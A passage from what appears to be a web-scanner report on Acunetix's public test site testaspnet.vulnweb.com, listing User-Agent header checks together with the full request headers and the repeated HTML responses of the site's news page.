href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Show / hide Request and Response
Request Header - size: 375 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Show / hide Request and Response
Request Header - size: 375 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 